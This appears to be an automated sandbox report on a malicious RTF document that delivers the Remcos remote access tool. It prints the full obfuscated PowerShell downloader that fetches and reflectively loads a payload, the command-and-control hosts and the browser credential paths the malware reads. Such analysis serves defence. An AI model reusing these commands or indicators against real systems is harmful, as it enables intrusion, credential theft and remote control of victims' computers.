              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_004120F7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419627 mouse_event,9_2_00419627
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrzaevsbglkwzfdkyrtsgvmbelewzezxssnwccpkcaoj0fvbnvybca9jysnihh3cgh0dhbzoi8vascrj2e2mccrjzaxjysnmdankycudscrj3mujysnyscrj3jjagl2zscrjy5vcicrj2cvjysnmjqvaxrlbxmvjysnzgv0ywgtbm90zs12lycrj0rldgenkydotm90zvyudhgnkyd0ehdwo0enkydvbminkydhc2u2jysnnenvbnrlbicrj3qgpscrjyankycotmv3jysnlu8nkydiaicrj2vjdcbtescrj3n0zw0utmv0jysnlldlyicrj0nsascrj2vudckurccrj293bmxvywrtdhjpbmcoqw8nkydudxjsjysnkttbb25iaw5hjysncnknkyddb250zw50jysniccrjz0gwycrj1mnkyd5c3rlbs5djysnb252zxj0xscrjzo6jysnricrj3jvbuinkydhcycrj2u2nfn0cmknkyduzycrjyhbb25iyxmnkydlnjrdb24nkyd0zscrj24nkyd0kttbb25hjysnc3nlbwjsesa9iftszscrj2zszwn0jysnaw9ujysnlicrj0fzc2unkydtymx5xto6tg9hzchbjysnb24nkydijysnaw5hcnldb250zw50kscrjztbb250exblid0gjysnqscrj29ujysnyscrj3nzzw1ijysnbccrj3knkycur2unkyd0vccrj3lwjysnzscrjyh4d3bsdscrj25qjysnrs4nkydib21lehdwkscrjztbb24nkydtzxrob2qnkycgpscrjyankydbb24nkyd0exbllkcnkydlde1ldghvzch4d3bwquknkyd4dycrj3ankycpo0fvjysnbm1ldghvzccrjy5jbicrj3zva2uoqw8nkydujysnbnvsbcwnkycgw28nkydiaicrj2vjdftdxuaoehdwjysndhh0lkmnkyddtycrj05llycrjzaznc8woc4yjysnndiunscrjzcnkycxljcnkycwjysnmscrjy8nkycvonb0dggnkyd4d3agjysnlcb4d3ankydkzxnhdgknkyd2ywqnkydvehdwjysniccrjywgjysnehcnkydwzgvzyscrj3rpdmfkb3h3ccankycsiccrj3h3cgqnkydlc2f0axzhjysnzg94d3ankycseccrj3dwjysnumvnqxnteccrj3cnkydwlhh3chgnkyd3cccrjyknkycpjykuckvwtefjzsgow2niqvjdnjurw2niqvjdmtexk1tjsefsxtexmcksw1n0uklor11by0hbul0znikuckvwtefjzsgnehdwjyxbu3rssu5hxvtjsefsxtm5ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $shellid[1]+$shellid[13]+'x')( ('aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'deta'+'hnotev.tx'+'txwp;a'+'onb'+'ase6'+'4conten'+'t ='+' '+'(new'+'-o'+'bj'+'ect sy'+'stem.net'+'.web'+'cli'+'ent).d'+'ownloadstring(ao'+'nurl'+');aonbina'+'ry'+'content'+' '+'= ['+'s'+'ystem.c'+'onvert]'+'::'+'f'+'romb'+'as'+'e64stri'+'ng'+'(aonbas'+'e64con'+'te'+'n'+'t);aona'+'ssembly = [re'+'flect'+'ion'+'.'+'asse'+'mbly]::load(a'+'on'+'b'+'inarycontent)'+';aontype = '+'a'+'on'+'a'+'ssemb'+'l'+'y'+'.ge'+'tt'+'yp'+'e'+'(xwpru'+'np'+'e.'+'homexwp)'+';aon'+'method'+' ='+' '+'aon'+'type.g'+'etmethod(xwpvai'+'xw'+'p'+');ao'+'nmethod'+'.in'+'voke(ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.c'+'co'+'nk/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'regasmx'+'w'+'p,xwpx'+'wp'+')'+')').replace(([char]65+[char]111+[char]110),[string][char]36).replace('xwp',[string][char]39))"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrzaevsbglkwzfdkyrtsgvmbelewzezxssnwccpkcaoj0fvbnvybca9jysnihh3cgh0dhbzoi8vascrj2e2mccrjzaxjysnmdankycudscrj3mujysnyscrj3jjagl2zscrjy5vcicrj2cvjysnmjqvaxrlbxmvjysnzgv0ywgtbm90zs12lycrj0rldgenkydotm90zvyudhgnkyd0ehdwo0enkydvbminkydhc2u2jysnnenvbnrlbicrj3qgpscrjyankycotmv3jysnlu8nkydiaicrj2vjdcbtescrj3n0zw0utmv0jysnlldlyicrj0nsascrj2vudckurccrj293bmxvywrtdhjpbmcoqw8nkydudxjsjysnkttbb25iaw5hjysncnknkyddb250zw50jysniccrjz0gwycrj1mnkyd5c3rlbs5djysnb252zxj0xscrjzo6jysnricrj3jvbuinkydhcycrj2u2nfn0cmknkyduzycrjyhbb25iyxmnkydlnjrdb24nkyd0zscrj24nkyd0kttbb25hjysnc3nlbwjsesa9iftszscrj2zszwn0jysnaw9ujysnlicrj0fzc2unkydtymx5xto6tg9hzchbjysnb24nkydijysnaw5hcnldb250zw50kscrjztbb250exblid0gjysnqscrj29ujysnyscrj3nzzw1ijysnbccrj3knkycur2unkyd0vccrj3lwjysnzscrjyh4d3bsdscrj25qjysnrs4nkydib21lehdwkscrjztbb24nkydtzxrob2qnkycgpscrjyankydbb24nkyd0exbllkcnkydlde1ldghvzch4d3bwquknkyd4dycrj3ankycpo0fvjysnbm1ldghvzccrjy5jbicrj3zva2uoqw8nkydujysnbnvsbcwnkycgw28nkydiaicrj2vjdftdxuaoehdwjysndhh0lkmnkyddtycrj05llycrjzaznc8woc4yjysnndiunscrjzcnkycxljcnkycwjysnmscrjy8nkycvonb0dggnkyd4d3agjysnlcb4d3ankydkzxnhdgknkyd2ywqnkydvehdwjysniccrjywgjysnehcnkydwzgvzyscrj3rpdmfkb3h3ccankycsiccrj3h3cgqnkydlc2f0axzhjysnzg94d3ankycseccrj3dwjysnumvnqxnteccrj3cnkydwlhh3chgnkyd3cccrjyknkycpjykuckvwtefjzsgow2niqvjdnjurw2niqvjdmtexk1tjsefsxtexmcksw1n0uklor11by0hbul0znikuckvwtefjzsgnehdwjyxbu3rssu5hxvtjsefsxtm5ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $shellid[1]+$shellid[13]+'x')( ('aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'deta'+'hnotev.tx'+'txwp;a'+'onb'+'ase6'+'4conten'+'t ='+' '+'(new'+'-o'+'bj'+'ect sy'+'stem.net'+'.web'+'cli'+'ent).d'+'ownloadstring(ao'+'nurl'+');aonbina'+'ry'+'content'+' '+'= ['+'s'+'ystem.c'+'onvert]'+'::'+'f'+'romb'+'as'+'e64stri'+'ng'+'(aonbas'+'e64con'+'te'+'n'+'t);aona'+'ssembly = [re'+'flect'+'ion'+'.'+'asse'+'mbly]::load(a'+'on'+'b'+'inarycontent)'+';aontype = '+'a'+'on'+'a'+'ssemb'+'l'+'y'+'.ge'+'tt'+'yp'+'e'+'(xwpru'+'np'+'e.'+'homexwp)'+';aon'+'method'+' ='+' '+'aon'+'type.g'+'etmethod(xwpvai'+'xw'+'p'+');ao'+'nmethod'+'.in'+'voke(ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.c'+'co'+'nk/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'regasmx'+'w'+'p,xwpx'+'wp'+')'+')').replace(([char]65+[char]111+[char]110),[string][char]36).replace('xwp',[string][char]39))"Jump to behavior
              Source: RegAsm.exe, 00000009.00000002.873432773.0000000000541000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434C52 cpuid 9_2_00434C52
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00452036
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_004520C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_00452313
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00448404
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_0045243C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_00452543
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00452610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,9_2_0040F8D1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_004488ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,9_2_00451CD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00451F50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00451F9B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00448957 GetSystemTimeAsFileTime,9_2_00448957
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B60D GetUserNameW,9_2_0041B60D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_00449190
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 8.2.powershell.exe.63d0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.40bdb68.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.63d0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.40bdb68.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.381541630.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.378809555.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3a10b60.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.873432773.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.873432773.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3764, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data9_2_0040BA12
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\9_2_0040BB30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db9_2_0040BB30

              Remote Access Functionality

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-R2I0JWJump to behavior
              Source: Yara matchFile source: 8.2.powershell.exe.63d0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.40bdb68.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.63d0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.40bdb68.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.381541630.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.378809555.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3a10b60.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.873432773.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.873432773.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3764, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe9_2_0040569A
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting
              Valid Accounts1
              Native API
              111
              Scripting
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              13
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts43
              Exploitation for Client Execution
              1
              DLL Side-Loading
              1
              Bypass User Account Control
              2
              Obfuscated Files or Information
              111
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol111
              Input Capture
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts12
              Command and Scripting Interpreter
              1
              Windows Service
              1
              Access Token Manipulation
              1
              Install Root Certificate
              2
              Credentials In Files
              1
              System Service Discovery
              SMB/Windows Admin Shares3
              Clipboard Data
              1
              Remote Access Software
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Service Execution
              Login Hook1
              Windows Service
              1
              DLL Side-Loading
              NTDS3
              File and Directory Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts3
              PowerShell
              Network Logon Script222
              Process Injection
              1
              Bypass User Account Control
              LSA Secrets34
              System Information Discovery
              SSHKeylogging213
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading
              Cached Domain Credentials2
              Security Software Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Modify Registry
              DCSync31
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
              Virtualization/Sandbox Evasion
              Proc Filesystem3
              Process Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              Application Window Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
              Process Injection
              Network Sniffing1
              System Owner/User Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
              Remote System Discovery
              Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528438 Sample: beNwFiUxpf.rtf Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 20 other signatures 2->51 10 WINWORD.EXE 291 13 2->10         started        process3 process4 12 EQNEDT32.EXE 12 10->12         started        17 EQNEDT32.EXE 10->17         started        dnsIp5 37 107.175.242.80, 49161, 49163, 80 AS-COLOCROSSINGUS United States 12->37 33 C:\Users\...\sweetbuddygirltodaysherewith.vBS, Unicode 12->33 dropped 73 Office equation editor establishes network connection 12->73 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->75 19 wscript.exe 1 12->19         started        file6 signatures7 process8 signatures9 53 Suspicious powershell command line found 19->53 55 Wscript starts Powershell (via cmd or directly) 19->55 57 Bypasses PowerShell execution policy 19->57 59 2 other signatures 19->59 22 powershell.exe 4 19->22         started        process10 signatures11 61 Suspicious powershell command line found 22->61 63 Obfuscated command line found 22->63 65 Suspicious execution chain found 22->65 25 powershell.exe 12 5 22->25         started        process12 dnsIp13 35 ia600100.us.archive.org 207.241.227.240, 443, 49162 INTERNET-ARCHIVEUS United States 25->35 67 Installs new ROOT certificates 25->67 69 Writes to foreign memory regions 25->69 71 Injects a PE file into a foreign processes 25->71 29 RegAsm.exe 3 10 25->29         started        signatures14 process15 dnsIp16 39 2024remcmon.duckdns.org 29->39 41 2024remcmon.duckdns.org 192.210.214.9, 14645, 49164 AS-COLOCROSSINGUS United States 29->41 43 geoplugin.net 178.237.33.50, 49165, 80 ATOM86-ASATOM86NL Netherlands 29->43 77 Contains functionality to bypass UAC (CMSTPLUA) 29->77 79 Detected Remcos RAT 29->79 81 Contains functionalty to change the wallpaper 29->81 85 4 other signatures 29->85 signatures17 83 Uses dynamic DNS services 39->83

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              beNwFiUxpf.rtf47%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
              beNwFiUxpf.rtf100%AviraHEUR/Rtf.Malformed
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://crl.entrust.net/server1.crl00%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://go.micros0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              http://ocsp.entrust.net0D0%URL Reputationsafe
